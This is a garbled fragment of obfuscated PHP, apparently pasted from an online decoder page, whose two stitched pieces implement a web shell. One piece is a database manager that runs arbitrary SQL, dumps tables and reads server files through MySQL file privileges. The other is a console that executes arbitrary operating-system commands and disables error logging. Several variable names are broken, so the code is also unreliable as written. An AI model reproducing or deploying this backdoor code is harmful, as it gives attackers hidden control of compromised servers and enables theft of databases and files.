$_POST["\x63\x68\x61\x72\x73\145\164"] : '') . "\47\76\xa\74\164\x64\76\74\x6c\x61\142\x65\154\x3e\x3c\x73\x65\154\145\143\164\40\x6e\x61\155\x65\75\47\x74\x79\x70\x65\x27\x3e\74\157\160\x74\x69\157\156\40\x76\x61\154\x75\x65\75\47\x6d\x79\x73\x71\154\x27\40"; if (@$_POST["\x74\x79\x70\x65"] == "\x6d\x79\x73\161\x6c") { echo "\163\145\154\x65\x63\164\145\144"; } echo "\76\x4d\171\123\x71\154\x3c\57\157\x70\164\151\157\x6e\x3e\x3c\157\x70\164\151\157\156\40\x76\x61\154\x75\145\x3d\47\x70\147\x73\x71\x6c\47\40"; if (@$_POST["\x74\171\x70\x65"] == "\160\x67\x73\161\154") { echo "\163\145\x6c\145\x63\x74\145\144"; } echo "\x3e\120\x6f\x73\x74\x67\162\145\123\x71\154\x3c\57\157\160\x74\x69\x6f\x6e\x3e\74\x2f\163\145\154\x65\143\164\76\74\x2f\x6c\141\x62\x65\x6c\x3e\x3c\57\x74\144\x3e\xa\x3c\164\x64\76\74\x69\156\x70\165\x74\x20\164\x79\160\x65\x3d\164\x65\x78\x74\40\x6e\x61\x6d\x65\x3d\x73\x71\x6c\x5f\150\x6f\x73\x74\40\x76\141\154\x75\145\x3d\42" . (empty($_POST["\163\161\154\x5f\150\x6f\x73\x74"]) ? "\154\157\x63\x61\x6c\x68\x6f\163\x74" : htmlspecialchars($_POST["\x73\161\154\x5f\150\157\x73\164"])) . "\42\x3e\74\x2f\x74\x64\76\xa\x3c\x74\x64\x3e\x3c\x69\x6e\160\165\164\x20\x74\171\x70\145\x3d\x74\145\x78\164\40\x6e\141\x6d\x65\x3d\163\161\154\137\154\x6f\x67\x69\x6e\40\166\141\154\x75\x65\75\42" . (empty($_POST["\163\161\154\x5f\x6c\x6f\x67\151\156"]) ? "\162\157\x6f\164" : htmlspecialchars($_POST["\163\161\154\137\154\157\147\151\156"])) . "\42\x3e\74\x2f\164\x64\x3e\xa\x3c\164\x64\76\74\x69\x6e\160\165\164\x20\x74\171\x70\x65\75\x74\145\x78\x74\40\x6e\141\155\x65\75\x73\161\154\x5f\x70\x61\163\x73\40\166\x61\x6c\x75\x65\75\x22" . (empty($_POST["\x73\x71\x6c\137\x70\x61\x73\163"]) ? '' : htmlspecialchars($_POST["\x73\161\154\137\160\x61\x73\x73"])) . "\42\40\x72\145\x71\x75\151\x72\x65\x64\x3e\x3c\57\164\144\x3e\x3c\x74\144\x3e"; $tmp = "\74\151\156\x70\x75\x74\x20\164\x79\x70\145\x3d\164\145\170\x74\40\x6e\x61\x6d\x65\x3d\163\161\154\137\x62\x61\x73\145\x20\x76\141\x6c\165\145\x3d\47\x27\x3e"; if (isset($_POST["\x73\161\154\137\x68\157\163\x74"])) { if ($db->connect($_POST["\x73\161\x6c\137\150\x6f\x73\x74"], $_POST["\163\x71\154\x5f\154\157\147\151\x6e"], $_POST["\x73\161\154\x5f\160\x61\163\x73"], $_POST["\163\x71\154\137\x62\141\x73\x65"])) { switch ($_POST["\x63\x68\x61\162\x73\x65\x74"]) { case "\x57\x69\156\144\x6f\167\163\x2d\x31\x32\65\61": $db->setCharset("\143\x70\61\62\x35\x31"); break; case "\x55\x54\x46\55\x38": $db->setCharset("\x75\x74\146\70"); break; case "\113\x4f\x49\x38\x2d\122": $db->setCharset("\x6b\157\x69\70\162"); break; case "\113\117\111\x38\x2d\x55": $db->setCharset("\153\157\x69\70\165"); break; case "\143\160\x38\x36\x36": $db->setCharset("\x63\x70\x38\x36\66"); break; } $db->listDbs(); echo "\74\x6c\x61\142\145\x6c\76\74\x73\x65\x6c\145\143\x74\40\x6e\x61\155\145\75\163\x71\154\x5f\x62\141\163\x65\76\x3c\x6f\160\164\151\x6f\156\x20\x76\141\x6c\x75\x65\x3d\x27\x27\76\x3c\x2f\x6f\x70\164\x69\x6f\156\x3e"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "\x3c\x6f\160\164\x69\157\x6e\x20\x76\x61\154\165\x65\75\x22" . $value . "\x22\x20" . ($value == $_POST["\163\161\x6c\x5f\x62\x61\x73\145"] ? "\163\145\154\x65\x63\x74\x65\x64" : '') . "\x3e" . $value . "\x3c\57\157\x70\x74\x69\157\x6e\76"; } echo "\74\x2f\x73\145\154\x65\143\x74\76\x3c\57\154\141\x62\145\x6c\x3e"; } else { echo $tmp; } } else { echo $tmp; } echo "\74\x2f\164\x64\76\12\11\11\x9\x9\x3c\164\144\76\x3c\x69\x6e\x70\x75\x74\40\x74\x79\160\145\75\163\x75\142\x6d\x69\164\40\x76\x61\x6c\x75\x65\x3d\x27\x73\x75\142\155\x69\x74\47\40\x6f\156\143\x6c\151\143\x6b\75\47\x66\x73\50\144\56\x73\146\51\x3b\x27\x3e\x3c\x2f\x74\144\x3e\12\40\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\40\40\40\74\x74\x64\x3e\x3c\x69\156\160\165\164\x20\x74\171\x70\x65\x3d\x63\x68\145\143\153\142\157\170\x20\x6e\x61\x6d\x65\x3d\163\161\154\x5f\143\x6f\165\156\164\40\166\x61\154\165\145\x3d\x27\157\156\47" . (empty($_POST["\x73\161\154\x5f\143\x6f\165\156\x74"]) ? '' : "\x20\143\x68\145\x63\x6b\145\x64") . "\76\40\x63\157\x75\x6e\164\40\164\150\145\40\156\165\155\x62\x65\162\40\x6f\x66\40\x72\x6f\x77\163\x3c\x2f\x74\144\76\xa\x9\11\x9\x3c\x2f\164\162\x3e\xa\11\11\74\x2f\x74\x61\x62\154\145\76\xa\11\x9\74\x73\143\x72\151\x70\164\76\xa\x20\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x73\137\x64\x62\75\47" . @addslashes($_POST["\163\161\x6c\x5f\x62\x61\x73\145"]) . "\47\x3b\12\x20\40\40\40\40\40\40\40\40\40\x20\x20\146\165\156\x63\x74\x69\157\x6e\x20\146\x73\x28\146\x29\x20\x7b\12\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\x20\40\x20\40\x69\x66\50\146\x2e\x73\x71\x6c\x5f\142\x61\x73\x65\x2e\166\141\x6c\x75\x65\41\x3d\x73\x5f\144\x62\x29\40\x7b\x20\x66\56\157\x6e\x73\x75\x62\x6d\151\164\40\75\x20\x66\x75\156\143\x74\x69\157\156\x28\x29\x20\x7b\175\73\xa\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\x69\146\50\x66\x2e\x70\61\51\x20\x66\56\x70\x31\x2e\166\x61\x6c\x75\x65\75\x27\x27\73\12\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\x69\146\x28\x66\x2e\160\62\51\x20\x66\56\x70\62\56\x76\141\154\x75\x65\x3d\47\47\x3b\12\x20\40\40\x20\40\40\x20\40\x20\40\40\40\40\x20\x20\40\40\40\40\x20\151\146\x28\146\56\160\63\51\40\146\56\x70\63\x2e\166\x61\154\165\x65\x3d\47\x27\73\12\x20\x20\40\x20\40\x20\40\40\x20\40\x20\40\x20\40\x20\40\x7d\12\40\x20\40\40\40\x20\x20\40\40\40\x20\x20\x7d\12\x9\11\x9\x66\x75\156\x63\164\151\x6f\156\x20\x73\164\50\x74\54\x6c\51\40\173\12\x9\11\11\11\144\x2e\x73\146\x2e\160\61\56\x76\x61\x6c\x75\x65\x20\75\40\x27\163\145\154\x65\143\164\47\x3b\12\11\x9\11\x9\x64\56\163\146\56\160\x32\x2e\166\141\154\x75\x65\x20\x3d\40\x74\x3b\xa\40\x20\x20\x20\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x69\146\50\154\x20\x26\46\x20\144\x2e\163\146\x2e\160\63\x29\40\x64\x2e\x73\x66\x2e\x70\63\x2e\x76\141\x6c\x75\x65\40\75\40\154\x3b\12\11\x9\11\11\144\x2e\x73\146\56\163\x75\x62\155\x69\x74\50\x29\x3b\xa\x9\x9\x9\175\12\x9\11\x9\146\x75\x6e\143\x74\151\x6f\x6e\x20\x69\163\50\x29\40\173\xa\x9\x9\11\x9\146\157\162\50\x69\75\60\73\x69\x3c\144\56\x73\x66\x2e\145\154\x65\x6d\x65\156\x74\x73\133\x27\x74\142\x6c\x5b\x5d\47\135\56\x6c\x65\156\x67\164\x68\x3b\x2b\x2b\x69\x29\xa\11\x9\11\x9\11\x64\x2e\x73\146\56\145\154\x65\155\x65\156\164\163\133\x27\164\x62\x6c\133\135\x27\x5d\133\151\135\56\143\150\x65\x63\153\145\144\40\75\40\x21\144\56\163\x66\x2e\145\154\145\x6d\x65\x6e\x74\163\133\x27\x74\x62\x6c\133\x5d\47\135\133\151\x5d\56\143\150\x65\143\x6b\145\144\x3b\xa\x9\x9\x9\x7d\xa\11\11\x3c\57\163\143\162\x69\160\x74\x3e"; if (isset($db) && $db->link) { echo "\x3c\x62\162\57\x3e\x3c\164\141\142\x6c\x65\x20\167\x69\144\x74\150\75\61\60\60\x25\x20\x63\145\x6c\154\160\141\144\144\x69\156\147\x3d\x32\40\143\145\x6c\x6c\x73\x70\x61\x63\x69\156\147\x3d\x30\x3e"; if (!empty($_POST["\x73\x71\154\137\142\x61\163\145"])) { $db->selectdb($_POST["\x73\161\154\137\142\x61\x73\x65"]); echo "\74\164\x72\x3e\x3c\x74\144\40\x77\151\x64\x74\x68\x3d\61\40\163\x74\x79\154\145\x3d\x27\142\x6f\x72\x64\x65\x72\55\x74\157\160\x3a\62\x70\170\x20\x73\x6f\154\x69\x64\40\43\66\66\x36\73\x27\76\x3c\163\x70\x61\156\x3e\124\141\142\x6c\145\x73\72\74\57\x73\160\141\156\x3e\74\x62\x72\76\x3c\x62\x72\76"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["\163\x71\154\137\x63\157\165\156\164"])) { $n = $db->fetch($db->query("\x53\x45\x4c\105\x43\124\x20\x43\x4f\x55\116\x54\x28\52\51\40\141\163\40\156\40\106\122\117\x4d\40" . $value . '')); } $value = htmlspecialchars($value); echo "\74\156\157\142\162\76\74\151\156\x70\x75\164\x20\164\x79\160\x65\x3d\47\143\150\x65\143\x6b\142\x6f\x78\x27\x20\156\x61\155\x65\x3d\47\x74\142\x6c\133\x5d\x27\x20\x76\x61\154\165\145\75\47" . $value . "\x27\x3e\x26\x6e\x62\163\x70\73\74\141\x20\150\162\145\x66\x3d\x23\x20\x6f\156\143\154\151\143\153\x3d\x22\163\164\x28\x27" . $value . "\47\x2c\61\51\x22\76" . $value . "\x3c\x2f\x61\x3e" . (empty($_POST["\x73\161\154\x5f\143\x6f\165\156\x74"]) ? "\46\156\142\x73\160\73" : "\x20\x3c\x73\x6d\x61\154\x6c\76\50{$n["\156"]}\51\x3c\57\x73\x6d\x61\154\x6c\x3e") . "\x3c\57\x6e\157\x62\x72\x3e\74\x62\x72\x3e"; } echo "\x3c\151\x6e\x70\165\x74\x20\x74\x79\x70\145\75\x27\143\x68\145\143\x6b\142\x6f\170\x27\x20\x6f\156\x63\154\x69\x63\153\75\47\151\163\x28\x29\x3b\x27\76\40\x3c\151\156\x70\165\x74\40\164\x79\x70\145\x3d\x73\x75\x62\x6d\151\164\40\x76\x61\154\165\x65\x3d\47\104\x75\x6d\x70\x27\x20\x6f\x6e\143\154\151\143\x6b\x3d\x27\144\157\143\x75\x6d\x65\x6e\x74\56\x73\x66\x2e\x70\x32\x2e\x76\141\x6c\x75\145\x3d\x22\144\x6f\x77\x6e\x6c\157\141\x64\42\73\144\x6f\143\165\155\x65\156\x74\56\163\146\x2e\x73\x75\x62\x6d\151\164\50\51\x3b\x27\76\x3c\142\x72\76\106\x69\x6c\145\40\160\141\164\150\72\x3c\x69\x6e\x70\x75\x74\40\x74\171\160\x65\x3d\x74\x65\x78\x74\40\156\141\x6d\145\x3d\146\151\x6c\145\40\x76\141\154\165\145\75\47\x64\165\x6d\160\x2e\x73\161\154\47\76\74\57\164\x64\76\74\x74\x64\40\163\164\171\x6c\x65\x3d\47\x62\x6f\x72\144\145\x72\55\x74\x6f\160\x3a\62\x70\x78\40\163\x6f\154\151\144\40\43\x36\x36\66\73\x27\76"; if (@$_POST["\x70\61"] == "\163\145\x6c\145\x63\x74") { $_POST["\x70\61"] = "\x71\x75\x65\x72\x79"; $_POST["\160\x33"] = $_POST["\160\63"] ? $_POST["\x70\x33"] : 1; $db->query("\123\105\x4c\105\103\124\40\x43\117\x55\x4e\x54\x28\52\51\40\x61\x73\40\x6e\x20\x46\122\117\115\x20" . $_POST["\160\x32"]); $num = $db->fetch(); $pages = ceil($num["\x6e"] / 30); echo "\x3c\163\143\162\x69\160\164\76\x64\56\163\146\56\157\156\x73\x75\x62\155\151\x74\x3d\146\165\x6e\x63\x74\151\157\x6e\50\51\173\x73\164\x28\x22" . $_POST["\x70\62"] . "\x22\54\x20\x64\x2e\x73\146\56\x70\x33\x2e\x76\x61\154\x75\145\x29\175\x3c\x2f\x73\x63\162\x69\x70\164\76\x3c\x73\x70\141\x6e\x3e" . $_POST["\160\x32"] . "\x3c\x2f\163\x70\x61\x6e\76\40\50{$num["\156"]}\x20\162\x65\143\157\x72\144\163\x29\40\x50\x61\147\145\40\x23\x20\x3c\151\x6e\x70\165\x74\40\x74\171\160\145\x3d\x74\x65\170\164\x20\156\x61\155\145\75\47\160\63\x27\x20\166\x61\x6c\165\145\75" . (int) $_POST["\x70\63"] . "\x3e"; echo "\x20\157\x66\40{$pages}"; if ($_POST["\160\63"] > 1) { echo "\40\74\141\40\150\x72\145\146\75\x23\x20\157\x6e\143\x6c\x69\143\153\x3d\47\x73\x74\x28\42" . $_POST["\x70\62"] . "\x22\x2c\40" . ($_POST["\160\x33"] - 1) . "\51\47\76\x26\154\164\73\40\x50\162\145\166\x3c\57\141\x3e"; } if ($_POST["\160\63"] < $pages) { echo "\40\74\x61\x20\x68\162\x65\146\x3d\43\x20\157\156\143\154\151\x63\153\75\x27\x73\164\50\x22" . $_POST["\x70\x32"] . "\42\x2c\40" . ($_POST["\x70\63"] + 1) . "\x29\47\76\x4e\x65\x78\164\x20\46\147\164\x3b\x3c\57\x61\x3e"; } $_POST["\160\63"]--; if ($_POST["\x74\x79\160\x65"] == "\160\x67\x73\161\154") { $_POST["\x70\62"] = "\123\x45\x4c\105\x43\124\x20\x2a\40\106\x52\x4f\x4d\x20" . $_POST["\160\62"] . "\x20\x4c\111\x4d\x49\x54\x20\x33\x30\40\117\x46\106\123\105\124\x20" . $_POST["\x70\63"] * 30; } else { $_POST["\x70\x32"] = "\123\105\114\x45\103\124\x20\52\40\x46\122\117\x4d\x20\x60" . $_POST["\x70\x32"] . "\140\x20\114\111\x4d\111\x54\40" . $_POST["\160\x33"] * 30 . "\x2c\x33\x30"; } echo "\x3c\x62\162\76\74\x62\162\76"; } if (@$_POST["\160\x31"] == "\x71\165\x65\x72\171" && !empty($_POST["\160\x32"])) { $db->query(@$_POST["\160\62"]); if ($db->res !== false) { $title = false; echo "\74\164\141\142\x6c\145\40\x77\151\144\x74\x68\x3d\61\x30\60\45\40\x63\145\x6c\x6c\163\x70\141\x63\151\156\x67\x3d\x31\x20\x63\145\x6c\154\x70\x61\144\144\x69\156\147\75\62\40\143\x6c\141\163\x73\75\x6d\141\x69\x6e\x3e"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "\74\x74\162\x3e"; foreach ($ as $key => $value) { echo "\x3c\x74\x68\x3e" . $key . "\x3c\x2f\x74\x68\76"; } reset($); $title = true; echo "\74\57\164\x72\x3e\x3c\164\x72\x3e"; $line = 2; } echo "\74\x74\x72\x20\x63\x6c\x61\163\x73\x3d\x22\x6c" . $line . "\42\x3e"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "\x3c\164\144\x3e\74\151\x3e\156\x75\x6c\x6c\74\x2f\151\x3e\74\57\x74\144\76"; } else { echo "\74\164\144\x3e" . nl2br(htmlspecialchars($value)) . "\x3c\x2f\x74\144\76"; } } echo "\x3c\x2f\164\x72\x3e"; } echo "\x3c\57\x74\141\x62\x6c\x65\x3e"; } else { echo "\x3c\144\151\166\76\x3c\142\76\x45\162\162\157\162\72\x3c\57\142\x3e\x20" . htmlspecialchars($db->error()) . "\74\x2f\144\151\166\76"; } } echo "\x3c\x62\x72\76\74\57\146\x6f\162\x6d\x3e\74\146\x6f\162\x6d\x20\157\156\x73\165\142\x6d\151\x74\x3d\47\x64\56\x73\146\x2e\x70\61\x2e\166\141\x6c\165\145\x3d\x22\161\x75\x65\x72\x79\42\73\144\x2e\x73\x66\x2e\160\x32\x2e\166\141\154\165\x65\x3d\164\150\151\x73\x2e\161\165\x65\162\171\x2e\x76\141\154\165\x65\73\144\157\143\x75\155\145\x6e\164\x2e\163\x66\x2e\163\x75\x62\155\151\x74\x28\51\x3b\x72\x65\x74\165\x72\156\x20\146\x61\154\x73\145\73\x27\x3e\x3c\x74\x65\170\164\x61\x72\145\141\40\x6e\141\x6d\145\75\x27\161\165\145\x72\x79\x27\x20\x73\x74\171\x6c\x65\75\47\x77\151\x64\x74\150\x3a\61\60\60\45\73\150\x65\151\x67\150\164\x3a\x31\60\x30\160\170\x27\76"; if (!empty($_POST["\160\62"]) && $_POST["\x70\x31"] != "\154\157\x61\144\x66\151\x6c\x65") { echo htmlspecialchars($_POST["\x70\62"]); } echo "\x3c\57\164\x65\x78\x74\141\162\145\x61\76\x3c\142\162\57\x3e\74\151\156\x70\x75\x74\40\164\171\x70\x65\75\163\x75\x62\155\x69\164\40\166\x61\x6c\x75\x65\x3d\x27\105\x78\x65\x63\x75\164\x65\x27\x3e"; echo "\74\57\x74\144\x3e\x3c\x2f\x74\162\76"; } echo "\74\57\164\141\142\154\145\x3e\x3c\57\x66\x6f\162\155\x3e\x3c\x62\162\57\x3e"; if ($_POST["\x74\171\x70\x65"] == "\x6d\x79\163\x71\x6c") { $db->query("\123\x45\114\105\103\x54\40\61\40\106\x52\117\115\x20\x6d\x79\x73\161\154\x2e\165\163\x65\162\x20\127\110\x45\x52\x45\40\143\x6f\156\x63\x61\x74\50\x60\x75\163\145\162\x60\54\x20\47\x40\x27\54\40\x60\150\x6f\x73\164\x60\x29\x20\x3d\x20\x55\x53\x45\122\50\51\x20\101\x4e\104\40\x60\x46\151\154\145\x5f\x70\x72\151\x76\x60\40\x3d\40\x27\x79\47"); if ($db->fetch()) { echo "\x3c\146\157\162\155\40\157\x6e\x73\165\x62\155\x69\164\x3d\47\x64\56\x73\x66\56\x70\61\x2e\166\141\x6c\x75\145\75\x22\x6c\157\141\x64\146\151\x6c\145\x22\73\x64\157\143\x75\x6d\x65\x6e\164\56\x73\x66\x2e\160\x32\56\166\x61\154\165\x65\75\164\150\151\163\56\x66\x2e\166\x61\154\165\145\x3b\144\157\x63\x75\155\145\156\164\56\x73\146\56\163\x75\142\155\151\164\x28\51\73\x72\145\164\x75\162\156\40\146\x61\154\163\x65\x3b\x27\76\x3c\163\x70\x61\x6e\x3e\114\x6f\141\144\40\x66\x69\x6c\x65\74\x2f\x73\160\x61\x6e\76\x20\74\x69\x6e\x70\165\164\x20\x20\143\x6c\x61\x73\163\x3d\47\164\x6f\157\x6c\163\x49\x6e\160\47\40\x74\171\x70\145\75\164\x65\170\x74\40\x6e\x61\155\145\75\146\x3e\74\x69\156\160\x75\x74\40\164\x79\160\145\x3d\163\165\x62\x6d\151\164\40\166\141\x6c\165\x65\x3d\47\x73\165\142\x6d\x69\x74\47\76\x3c\57\x66\157\x72\155\x3e"; } } if (@$_POST["\x70\x31"] == "\x6c\157\x61\144\x66\151\154\145") { $file = $db->loadFile($_POST["\160\62"]); echo "\x3c\142\x72\x2f\76\74\160\x72\145\40\143\x6c\x61\x73\x73\75\x6d\154\61\x3e" . htmlspecialchars($file["\x66\x69\x6c\x65"]) . "\74\x2f\160\162\x65\76"; } } else { echo htmlspecialchars($db->error()); } echo "\x3c\x2f\x64\151\x76\x3e"; hardFooter(); } goto et3or; hwJg4: @ini_set("\x6c\157\147\137\x65\x72\162\157\162\163", 0); goto gkT1m; WJp40: $home_cwd = @getcwd(); goto YIyjV; G6Uv3: 
Did this file decode correctly?
Original Code
goto r3B2Y; Oda8Q: function actionConsole() { if (!empty($_POST["\x70\61"]) && !empty($_POST["\160\x32"])) { prototype(md5($_SERVER["\110\124\124\120\x5f\110\117\x53\124"]) . "\x73\164\144\145\x72\162\x5f\x74\x6f\137\157\x75\164", true); $_POST["\x70\x31"] .= "\x20\62\76\x26\61"; } elseif (!empty($_POST["\x70\x31"])) { prototype(md5($_SERVER["\110\x54\124\120\x5f\110\117\123\124"]) . "\163\164\x64\x65\162\162\137\x74\157\x5f\157\165\164", 0); } if (isset($_POST["\141\x6a\x61\x78"])) { prototype(md5($_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"]) . "\x61\x6a\141\170", true); ob_start(); echo "\144\x2e\x63\146\x2e\x63\x6d\x64\56\166\141\x6c\x75\145\75\x27\x27\x3b\12"; $temp = @iconv($_POST["\x63\150\x61\162\x73\145\164"], "\x55\x54\106\x2d\x38", addcslashes("\12\44\x20" . $_POST["\160\61"] . "\12" . ex($_POST["\x70\x31"]), "\12\xd\x9\134\47\0")); if (preg_match("\41\x2e\52\143\x64\134\x73\x2b\50\x5b\x5e\x3b\135\x2b\x29\44\x21", $_POST["\160\61"], $match)) { if (@chdir($match[1])) { $GLOBALS["\143\x77\144"] = @getcwd(); echo "\143\x5f\75\x27" . $GLOBALS["\143\x77\x64"] . "\47\x3b"; } } echo "\x64\x2e\x63\x66\x2e\157\165\x74\x70\165\x74\56\166\141\154\x75\x65\53\x3d\47" . $temp . "\47\73"; echo "\144\x2e\143\146\x2e\157\x75\x74\160\165\164\x2e\163\143\162\x6f\x6c\x6c\124\157\160\x20\x3d\x20\144\56\143\146\56\157\x75\164\x70\x75\164\x2e\x73\143\162\x6f\154\154\x48\x65\x69\x67\x68\x74\73"; $temp = ob_get_clean(); echo strlen($temp), "\12", $temp; die; } if (empty($_POST["\141\152\x61\x78"]) && !empty($_POST["\160\61"])) { prototype(md5($_SERVER["\110\124\x54\120\137\110\117\x53\x54"]) . "\x61\x6a\141\x78", 0); } hardHeader(); echo "\74\x73\x63\x72\151\160\164\76\12\x69\x66\x28\x77\x69\156\144\157\167\56\x45\x76\x65\156\x74\51\x20\167\151\156\144\157\x77\x2e\x63\x61\x70\164\165\x72\x65\x45\166\145\156\x74\163\x28\105\x76\145\x6e\x74\x2e\x4b\105\x59\104\x4f\127\116\x29\x3b\xa\x76\x61\x72\40\143\x6d\x64\163\x20\75\40\x6e\145\x77\x20\101\162\162\141\171\x28\47\x27\51\73\12\x76\141\162\x20\143\165\x72\40\x3d\40\60\x3b\12\x66\165\x6e\143\164\x69\157\156\x20\153\x70\x28\145\51\40\x7b\12\x9\x76\141\162\x20\x6e\x20\x3d\x20\50\x77\x69\156\144\157\167\56\105\x76\x65\x6e\164\x29\40\77\40\x65\x2e\167\150\151\x63\150\x20\x3a\40\145\x2e\153\145\x79\103\157\144\x65\x3b\12\x9\x69\146\50\156\x20\75\75\x20\x33\70\x29\x20\173\12\11\x9\143\x75\x72\x2d\x2d\x3b\xa\11\x9\x69\x66\x28\x63\165\162\x3e\75\60\x29\12\x9\x9\11\144\157\143\165\x6d\145\x6e\164\x2e\143\x66\56\143\x6d\x64\x2e\x76\141\154\165\x65\40\x3d\40\143\x6d\144\x73\x5b\x63\x75\x72\135\x3b\xa\11\x9\145\x6c\163\145\xa\x9\x9\x9\x63\x75\162\x2b\x2b\x3b\xa\11\175\40\145\x6c\163\x65\40\151\146\50\x6e\x20\75\75\x20\x34\x30\x29\40\173\xa\11\x9\143\165\x72\x2b\53\x3b\xa\x9\11\151\146\x28\143\165\x72\x20\74\x20\x63\155\x64\163\56\154\x65\x6e\147\164\150\x29\xa\x9\11\11\144\157\143\165\155\145\156\164\x2e\x63\x66\56\x63\x6d\x64\56\x76\x61\154\x75\145\40\x3d\40\x63\155\x64\163\x5b\143\x75\162\135\73\12\x9\x9\x65\154\x73\145\12\11\x9\x9\x63\x75\162\55\x2d\x3b\12\x9\x7d\12\175\12\x66\165\156\143\x74\x69\157\156\x20\141\x64\144\x28\143\x6d\x64\x29\x20\x7b\xa\x9\x63\155\x64\x73\56\160\157\160\50\x29\x3b\xa\11\x63\155\144\163\x2e\160\165\163\x68\x28\143\155\144\51\x3b\12\x9\x63\x6d\144\163\56\160\x75\163\150\50\47\x27\51\x3b\xa\x9\143\x75\162\40\75\x20\143\155\x64\x73\56\x6c\x65\156\x67\x74\150\55\61\x3b\xa\175\12\x3c\x2f\x73\x63\x72\151\x70\164\76"; echo "\74\x68\x31\76\x43\157\x6e\163\157\154\145\74\x2f\x68\61\76\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\75\x63\x6f\x6e\164\145\156\164\x3e\74\x66\x6f\162\155\x20\156\x61\155\145\75\143\146\40\x6f\156\163\165\x62\x6d\151\x74\x3d\x22\151\x66\x28\x64\x2e\143\x66\x2e\143\x6d\x64\x2e\x76\141\154\165\145\75\75\x27\x63\154\145\141\162\x27\x29\173\144\x2e\x63\x66\56\x6f\165\164\x70\165\x74\56\166\x61\154\165\145\x3d\47\47\73\x64\x2e\x63\x66\x2e\143\x6d\x64\x2e\x76\x61\154\165\145\75\47\47\x3b\x72\145\164\165\x72\x6e\40\x66\x61\x6c\x73\145\73\175\x61\x64\x64\x28\164\x68\151\163\56\x63\155\144\56\x76\x61\x6c\165\x65\x29\73\x69\146\x28\164\150\151\x73\56\141\152\x61\170\56\143\150\x65\x63\153\x65\144\51\x7b\141\50\156\x75\x6c\154\x2c\156\x75\x6c\154\x2c\x74\x68\151\163\x2e\x63\155\144\x2e\166\x61\154\x75\145\54\164\x68\x69\163\56\163\x68\x6f\167\137\x65\x72\x72\x6f\x72\163\56\x63\150\145\x63\x6b\145\x64\77\61\x3a\x27\x27\x29\73\175\x65\x6c\x73\145\x7b\147\50\156\x75\x6c\x6c\x2c\x6e\x75\x6c\154\x2c\x74\x68\x69\x73\x2e\143\x6d\144\56\x76\x61\x6c\165\x65\54\x74\x68\151\163\56\x73\150\157\167\137\x65\x72\162\157\162\163\x2e\x63\x68\x65\x63\153\145\x64\x3f\x31\72\x27\47\x29\73\x7d\x20\x72\x65\x74\x75\162\x6e\40\x66\141\x6c\x73\145\x3b\42\x3e\x3c\154\x61\x62\145\154\x3e\74\163\x65\x6c\145\x63\x74\40\156\141\155\145\x3d\141\x6c\x69\x61\x73\x3e"; foreach ($GLOBALS["\x61\x6c\x69\x61\163\x65\x73"] as $n => $v) { if ($v == '') { echo "\74\x6f\160\x74\x67\x72\157\x75\160\40\x6c\141\x62\145\x6c\x3d\x22\x2d" . htmlspecialchars($n) . "\x2d\42\x3e\74\57\x6f\160\x74\x67\162\157\x75\x70\x3e"; continue; } echo "\74\157\x70\x74\151\x6f\156\40\x76\x61\154\x75\145\x3d\42" . htmlspecialchars($v) . "\42\76" . $n . "\x3c\x2f\157\x70\x74\151\x6f\x6e\76"; } echo "\x3c\x2f\163\x65\x6c\145\x63\164\x3e\74\57\x6c\x61\142\145\154\76\x3c\x69\x6e\x70\165\x74\x20\x74\171\x70\x65\x3d\142\165\164\x74\157\x6e\x20\157\x6e\143\154\x69\x63\153\75\42\141\144\144\x28\144\x2e\x63\146\x2e\141\154\151\141\163\x2e\166\141\x6c\165\145\x29\x3b\x69\x66\x28\x64\x2e\x63\x66\x2e\141\x6a\x61\x78\x2e\x63\x68\x65\143\x6b\x65\x64\x29\173\141\x28\156\165\154\x6c\54\156\165\154\x6c\54\144\56\143\x66\x2e\141\154\151\141\x73\x2e\x76\141\154\165\145\x2c\144\x2e\143\146\56\163\150\157\x77\137\145\162\x72\x6f\x72\163\56\143\150\x65\143\x6b\145\144\x3f\61\x3a\x27\x27\51\x3b\x7d\145\x6c\x73\x65\x7b\x67\x28\156\x75\154\154\x2c\156\x75\x6c\x6c\54\144\56\x63\146\x2e\141\154\x69\x61\x73\x2e\x76\141\154\x75\145\54\x64\x2e\x63\146\56\x73\150\x6f\x77\x5f\x65\x72\162\x6f\162\163\56\143\150\145\x63\x6b\145\144\x3f\61\x3a\x27\x27\51\73\x7d\x22\40\166\x61\154\x75\x65\x3d\x22\x73\x75\x62\155\x69\164\42\x3e\40\74\x6e\x6f\x62\162\x3e\x3c\x69\156\160\165\164\x20\164\x79\160\145\x3d\x63\x68\145\x63\x6b\x62\x6f\170\40\156\141\155\x65\75\141\152\x61\170\x20\166\141\154\165\145\75\x31\40" . (@$_COOKIE[md5($_SERVER["\x48\124\x54\x50\x5f\x48\x4f\123\x54"]) . "\141\152\x61\x78"] ? "\143\x68\145\x63\153\145\x64" : '') . "\76\x20\163\x65\x6e\x64\x20\165\x73\x69\x6e\147\x20\x41\112\101\x58\x20\x3c\151\x6e\x70\x75\164\x20\164\171\160\x65\75\143\x68\145\143\x6b\142\x6f\x78\40\x6e\x61\155\145\x3d\163\x68\157\167\x5f\x65\162\x72\157\x72\x73\x20\166\x61\154\x75\x65\x3d\61\40" . (!empty($_POST["\x70\62"]) || $_COOKIE[md5($_SERVER["\x48\124\124\120\137\x48\117\x53\124"]) . "\163\164\144\x65\162\x72\137\164\157\137\157\165\x74"] ? "\x63\150\145\x63\153\x65\144" : '') . 